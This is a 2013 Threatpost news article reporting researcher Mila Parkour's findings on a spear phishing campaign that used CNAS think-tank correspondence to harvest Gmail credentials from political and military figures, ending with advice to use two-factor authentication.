Obama-Favored Think Tank Used as Bait in Spear Phishing Attacks

ID THREATPOST:AA2AE1166617EAB7C7F1F66788A56520
Type threatpost
Reporter Paul Roberts
Modified 2013-04-17T16:34:00


Spear phishing attacks against U.S. government officials, politicians and public policy wonks are using a D.C. think tank favored by the Obama Administration as bait, according to a report from researcher Mila Parkour.

A new report out from virus researcher Mila Parkour on the blog Contagio says that targeted attacks are using correspondence from The Center for a New American Security (CNAS), a Washington, D.C. think tank favored by the Obama administration as bait in so-called spear phishing attacks.

The attacks are aimed at collecting log-in credentials for Google Gmail accounts used by high level political and military figures, as well as policymakers in target countries. They are a continuation of an extended spear phishing campaign against targets in the U.S., Europe and Asia that prompted a warning from Google in June. Despite those warnings, the latest e-mail suggests that the attacks – believed to be based in China – continue to try to government and political establishment, Parkour writes.

CNAS has already sent two employees to key jobs within the Obama administration: founders Michèle Flournoy and Kurt Campbell serve as the Undersecretary of Defense for Policy and the Assistant Secretary of State for East Asian and Pacific Affairs, respectively.

Parkour reported that e-mail messages with the subject relating to the recent report “CNAS Report Calls Declining Satellite Capabilities National Security Concern” were sent to Gmail accounts for “a person associated with political and international affairs.” The messages appear to come from a trusted contact and contain a subscription form which asks for Gmail credentials to subscribe. Those credentials are harvested and deposited on one of a series of compromised servers, many located within the U.S. The user is redirected back to Gmail. Subsequently, the account is monitored by unknown parties using the harvested credentials.

A test account Parkour “registered” with the attackers was accessed a mere two hours after the credentials were harvested. Attackers accessed the account using TOR (The Onion Router), so its unclear where they accessed the account from. However, other aspects of the spear phishing attack bear the telltale signatures of a China-based operation, including the source IP of the phishing e-mail, which traces back to Taiwan, and the attackers use of Foxmail to create and send the phishing e-mail – a common trait of China-based spear phishing attacks.

Parkour said she has informed Google about the latest round of spear phishing e-mails, but that the company is limited in how it can respond to stop them.

Users who are concerned about account safety should use two-factor authentication and frequently change out account passwords, she recommends.